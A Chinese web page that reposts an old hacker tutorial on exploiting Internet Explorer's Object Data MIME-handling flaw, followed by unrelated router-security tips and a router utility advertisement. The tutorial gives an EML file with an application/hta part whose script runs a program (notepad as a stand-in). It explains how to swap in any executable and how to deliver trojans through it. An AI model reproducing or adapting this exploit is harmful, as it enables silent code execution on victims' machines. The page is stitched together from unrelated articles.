由错误MIME漏洞的利用想到的

作者:小菜 更新时间:2025-03-05 点击数:
简介:由错误MIME漏洞的利用想到的 由错误MIME漏洞的利用想到的......---IE Object Data 数据远程执行漏洞的利用作者:冰狐浪子邮箱:icy

【菜科解读】

由错误MIME漏洞的利用想到的 由错误MIME漏洞的利用想到的......---IE Object Data 数据远程执行漏洞的利用作者:冰狐浪子邮箱:icyfox@eyou.com主页:www.godog.y365.com测试代码:http://y365.com/godog/eml/

声明:因为本文所讲方法破坏性极大,可以和错误MIME漏洞及com.ms.activeX.ActiveXComponent漏洞相媲美,因此请不要利用本文所讲内容用于破坏!否则后果自负!

网友braveboy3来信问我一些问题,信中提到Internet Explorer Object数据远程执行漏洞,我急忙驱猫上网查看,从绿盟科技上找到了漏洞资料,同时请braveboy3给了一个测试该漏洞的网页。

下面我结合自己的测试简单介绍一下这个漏洞:

由于IE处理对象标记OBJECT的DATA标签时没有正确处理要被装载的文件参数,当"OBJECT"标记中用于设置对象的MIME类型的"Type"属性不为空时,IE会根据标记中的"Type"值装载文件,此时若控件不安全则IE会提示是否执行,测试代码如下: 但当"Type"属性为空时,IE会根据服务器返回的HTTP头中的Content-Type来处理数据,此时却没有充分检查被装载的文件属性,也就是说如果服务器返回的HTTP头中的Content-Type是application/hta等,那么脚本就会绕过安全区域限制而能够执行。

(见网友braveboy3提供的测试网页:http://202.113.125.60/pic/test/test.html)

看到上面的介绍相信大家一定会想到通过更改服务器的MIME映射为:扩展名.hta对应application/hta来利用此漏洞,;而熟悉ASP编程的朋友可能会想到通过用“ %response.ContentType="application/hta"%>”这条语句来设置MIME类型而利用该漏洞(也可用其他的动态网页语言如:PHP等)。

事实上网上此漏洞的利用方法也多为上面两种方法。

可是大多数网友并没有自己的服务器,而且现在的免费空间却鲜有支持ASP或其他动态网页语言的,所以此漏洞利用起来有点困难(老鸟例外,有肉鸡呀!呵呵....)

怎么办?难道我们只有眼睁睁的看着漏洞从眼皮底下走过?NO!那不是“黑客”行为!

大家对错误MIME漏洞耳熟能详了吧?它的利用借助了eml格式的文件。

大家一定还记得“Content-Type: audio/x-wav;”这句代码吧?它就是用于设置MIME类型的!是不是想到了点什么?对把它改成“Content-Type: application/hta;”;可怎样设置OBJECT的DATA标签的URL地址呢?看MIME漏洞利用中的这句“”,其中src不就是一个URL地址吗?好啦,都解决拉,下面就让我们开始打造一个新的木马文件吧!下面就是我改好的eml文件源代码:

MIME-Version: 1.0 /*MIME-多用途的网际邮件扩充协议的版本*/Content-Type: multipart/related; /*内容类型*/type="multipart/alternative";boundary="1" /*分界线*/

--1 Content-Type: multipart/alternative;boundary="2"

--2Content-Type: text/html;charset="gb2312"Content-Transfer-Encoding: quoted-printable

IE Object Data 数据远程执行漏洞测试如果自动打开记事本程序,则说明测试成功! --2--

--1 Content-Type: application/hta;Content-Transfer-Encoding: 7bitContent-ID:

说明:可以自己加入其他代码或控件 script language=JavaScript>wsh.Run("notepad.exe");//打开记事本程序,可改为自己要执行的程序window.close();//关闭hta文件 /script --1--

测试代码说明:把上面的代码保存为test.eml,另外再建一个test.htm文件,内容如下:

打开test.htm文件就可以看到结果!/*和*/之间的内容是注释可去掉,可以参照《黑客防线》第九期“无坚不摧的杀手锏--利用Windows帮助文件漏洞运行木马”一文,在不使用com.ms.activeX.ActiveXComponent漏洞(此漏洞早已出现,可能多数已打补丁)情况下,下载执行木马程序。

由,错误,MIME,漏洞,的,利用,想到,由,错误,MIME

无线路由器如何防止蹭网?无线路由器防蹭网设置教程

这年头蹭网族是越来越壮大(PS:本人当年也是蹭网一族,开始折腾破解,后来折腾怎么不让别人破解),越来越疯狂,没一定的技术与策略还不一定能够防住蹭网族的猛烈攻击,面对如此局面当然不能坐以待毙,必须严防死守让蹭网族毁于无形。

由于蹭网技术被大肆炒作,很多人都担心自己辛辛苦苦花钱开通的网络被他人轻易“蹭”了去。

正所谓“魔高一尺道高一丈”,方法总比问题多。

下面用图文来教大家如何降低被蹭网的概率。

本人路由器型号:斐讯302M,以此路由器为例,其他型号路由器均可以以此为教程设置。

1、【修改路由器管理地址及管理账号、密码】PS:如果蹭网者连上你的网络,如未修改默认管理地址、管理账号及密码,蹭网者可以轻松的获取你的宽带账号、密码路由器都有一个管理地址(路由器的背面或说明书上有),一般默认地址为:192.168.0.1或192.168.1.1,这个地址是用来配置路由器的,在浏览器中输入管理地址,再输入管理账号密码(一般管理账号、密码默均认为:admin),如下图:登录以后,按照下图标准进行修改管理地址,然后保存保存之后,按照下图继续修改路由器管理账号、密码,然后保存2、【隐藏SSID】 增加蹭网者获取你的SSID的难度按照下图标注设置隐藏SSID,并保存3、【将密码修改为较为复杂的密码】降低密码被破解的概率设置如下图:4、【绑定MAC】 不在你绑定MAC地址之列的电脑、移动设备将无法连接上网(除非蹭网者知道你的设备的MAC地址,然后将设备的MAC修改成你的设备MAC)设置如下图:如何查看本机MAC地址:点击电脑桌面右下角【开始】图标,在搜索框中输入CMD,跳出命令提示符框,输入ipconfig/all 即可查到本机MAC地址,移动设备的MAC地址请到移动设备中查看,见下图5、【关闭WPS功能】 防止蹭网者使用PIN码连接你的网络关闭方法见下图温馨提示:1、设置以上功能时,路由器可能会自动重启,无需担心;2、设置完成后,请牢记自己的SSID、无线密码;先写点简单的,后续有空再更新,如果大家能按照以上设置设置自己的路由器,破解的概率将降低80%以上。

正所谓没有最锋利的矛,亦没有最坚固的盾,这是一场持久的“攻防战”。

无线,路由器,如何,防止,蹭网,防蹭,网,设置,这,

路由器被黑?被篡改?路由卫士一键搞定

新买的路由器不会设置?不会修改无线密码?能上QQ却无法浏览网页?看视频总是有很长的广告?路由器每天都要重启才能正常使用?路由器还出现莫名其妙的掉线。

我们该怎么办呢?这些常见的网络问题总是困扰着我们,其实这些都不算个事儿,您只需要安装个路由卫士神器就可以帮您搞定这一切!下载安装路由卫士,打开并单击“立即检查”(如果是第一次使用,请在弹出的登陆窗口中输入路由器的管理账号及密码),路由卫士会自动帮您检查出目前的网络状况。

点击“一键优化”,可以自动开启屏广告功能,优化网络性能,检测DNS健康状况以及路由器是否有新的固件更新来提高路由器的稳定性。

出现的问题我们可以对应进行设置,单击“修改”或“设置”路由卫士会自动跳转到高级设置页面的对应设置项。

如果您是pppoe拨号上网的网络,可在上网设置页面的拨号上网窗口中输入宽带帐号密码。

新路由器或者初始化后的路由器默认无线WIFI是没有加密的,为了防止被蹭网,建议设置较复杂的密码。

为了网络的安全性,我们强烈建议用户修改路由器的管理密码,不要设置为安全性较低的通用性密码,例如:admin,root,guest,user,123456等……,最好也不要与无线wifi密码相同。

这么一款简易的软件,让您不再需要为网络问题而烦恼啦。

路由卫士永远为您的路由器保驾护航,从而确保上网安全。

软件名称:路由卫士1.4.16.70官方版 软件大小: 1.9M 下载地址:http://www.pc6.com/softview/SoftView_111611.html 路由器,被,黑,篡改,路由,卫士,一键,搞定,

加入收藏
               

由错误MIME漏洞的利用想到的

点击下载文档

格式为doc格式

  • 账号登录
社交账号登录